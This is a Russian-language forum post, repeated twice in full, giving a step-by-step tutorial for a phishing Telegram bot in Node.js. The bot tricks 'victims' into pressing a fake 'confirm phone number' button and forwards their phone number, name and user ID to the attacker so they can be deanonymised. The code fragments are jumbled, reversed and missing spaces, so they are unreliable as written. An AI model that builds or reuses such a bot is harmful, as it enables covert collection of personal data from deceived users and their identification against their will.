Download_Link
New member
Приветствую! Сегодня мы создадим простого Фишинг Телеграм Бота на Node.Js, который будет запрашивать номер телефона жертвы, а затем пересылать его нам - таким образом можно сдеанонить жертву.
Подготовка:
Для начала необходимо установить.
LOCKNET
При установке оставляем все по дефолту и перезагружаем компьютер.
После установки Node.Js и перезагрузки компьютера создаем папку с проектом в папке с Node.Js, а также создаем файл index.js уже в папке именно проекта
LOCKNET
Открываем Node.Js command prompt, заходим в папку с нашим ботом, и после прописываем следующие команды:
LOCKNETnpm i node-telegram-bot-apinpm init -y
После установки структура файлов будет выглядеть так:
LOCKNET
LOCKNET Получаем Токен:
2. Создаем переменную TOKEN - которая будет хранить Токен бота:
const TOKEN = "Ваш Токен"
3. И создаем самого бота для дальнейших действий:
Первое значение - это Токен, второе это настройки, но лучше оставить так как я написалconstbot=newTelegramBot(TOKEN,{polling:true});
4. Теперь давайте сделаем чтобы на текст /start бот просил якобы "Подтвердить номер телефона":
});bot.sendMessage(id,`Подтвердитесвойномертелефона`) // Отправляем сообщение написавшей жертвеconstid=msg.chat.id; // id это ID чата, чтобы отправлять сообщение именно пользователю который это написалbot.onText(//start/,function(msg){
Для того чтобы скрипт запустился, необходимо запустить Node.js command prompt, командами cd перейти в нашу папку и написать:
После написания команды, выскочит предупреждение, но оно вылазит всегдаnode index.js
P.S: После каждого обновления скрипта необходимо перезапускать бота в Node.Js command prompt
LOCKNET
Теперь пишем боту:
LOCKNET
Как видите он и правда отвечает, теперь сделаем красивую клавиатуру, и чтобы после ее нажатия злоумышленнику (То есть нам) приходил контакт собеседника:
});})}}]]request_contact:true // Будем ли мы запрашивать контактtext:"Подтвердитьтелефон", // Текст который будет на клавиатуреkeyboard:[[{reply_markup:{ // Отправляем также клавиатуруbot.sendMessage(id,`Подтвердитесвойномертелефона`,{console.log(id); // Нам надо также запомнить chat_id с нами, это потребуется в будующемconstid=msg.chat.id; //id-этоIDчата,чтобыотправлятьсообщениеименнопользователюкоторыйэтонаписалbot.onText(//start/,function(msg){
Перезапускаем наш скрипт:
Ctrl + c
LOCKNETnode index.js
И действительно, теперь юзер отправляет боту свой номер телефона по кнопке,осталось сделать чтобы он пересылался нам (Злоумышленнику)
LOCKNET
Теперь также мы знаем Chat ID "админа" (То есть нас) - Куда бот будет отправлять контакт
Остался последний шаг, проводим корректировки:
Практика:});bot.sendMessage(admin,"UserID:"+msg.contact.user_id);bot.sendMessage(admin,"Фамилия:"+msg.contact.last_name);bot.sendMessage(admin,"Имя:"+msg.contact.first_name);bot.sendMessage(admin,"Телефонныйномер:"+msg.contact.phone_number);bot.on("contact",function(msg){constadmin="ВашчатID";
Вот как видит жертва:
А вот что получаем мы:
Полный код бота доступен в репозитории на .
Источник: @mitchel_ed
Подготовка:
Для начала необходимо установить.
LOCKNET
При установке оставляем все по дефолту и перезагружаем компьютер.
После установки Node.Js и перезагрузки компьютера создаем папку с проектом в папке с Node.Js, а также создаем файл index.js уже в папке именно проекта
LOCKNET
Открываем Node.Js command prompt, заходим в папку с нашим ботом, и после прописываем следующие команды:
LOCKNETnpm i node-telegram-bot-apinpm init -y
После установки структура файлов будет выглядеть так:
LOCKNET
LOCKNET Получаем Токен:
- Пишем /start Телеграм боту
- Пишем /newbot
- Пишем имя бота, затем username
- Профит! Мы получили Токен!
- Подключаем установленную библиотеку:
2. Создаем переменную TOKEN - которая будет хранить Токен бота:
const TOKEN = "Ваш Токен"
3. И создаем самого бота для дальнейших действий:
Первое значение - это Токен, второе это настройки, но лучше оставить так как я написалconstbot=newTelegramBot(TOKEN,{polling:true});
4. Теперь давайте сделаем чтобы на текст /start бот просил якобы "Подтвердить номер телефона":
});bot.sendMessage(id,`Подтвердитесвойномертелефона`) // Отправляем сообщение написавшей жертвеconstid=msg.chat.id; // id это ID чата, чтобы отправлять сообщение именно пользователю который это написалbot.onText(//start/,function(msg){
Для того чтобы скрипт запустился, необходимо запустить Node.js command prompt, командами cd перейти в нашу папку и написать:
После написания команды, выскочит предупреждение, но оно вылазит всегдаnode index.js
P.S: После каждого обновления скрипта необходимо перезапускать бота в Node.Js command prompt
LOCKNET
Теперь пишем боту:
LOCKNET
Как видите он и правда отвечает, теперь сделаем красивую клавиатуру, и чтобы после ее нажатия злоумышленнику (То есть нам) приходил контакт собеседника:
});})}}]]request_contact:true // Будем ли мы запрашивать контактtext:"Подтвердитьтелефон", // Текст который будет на клавиатуреkeyboard:[[{reply_markup:{ // Отправляем также клавиатуруbot.sendMessage(id,`Подтвердитесвойномертелефона`,{console.log(id); // Нам надо также запомнить chat_id с нами, это потребуется в будующемconstid=msg.chat.id; //id-этоIDчата,чтобыотправлятьсообщениеименнопользователюкоторыйэтонаписалbot.onText(//start/,function(msg){
Перезапускаем наш скрипт:
Ctrl + c
LOCKNETnode index.js
И действительно, теперь юзер отправляет боту свой номер телефона по кнопке,осталось сделать чтобы он пересылался нам (Злоумышленнику)
LOCKNET
Теперь также мы знаем Chat ID "админа" (То есть нас) - Куда бот будет отправлять контакт
Остался последний шаг, проводим корректировки:
Практика:});bot.sendMessage(admin,"UserID:"+msg.contact.user_id);bot.sendMessage(admin,"Фамилия:"+msg.contact.last_name);bot.sendMessage(admin,"Имя:"+msg.contact.first_name);bot.sendMessage(admin,"Телефонныйномер:"+msg.contact.phone_number);bot.on("contact",function(msg){constadmin="ВашчатID";
Вот как видит жертва:
А вот что получаем мы:
Полный код бота доступен в репозитории на .
Источник: @mitchel_ed
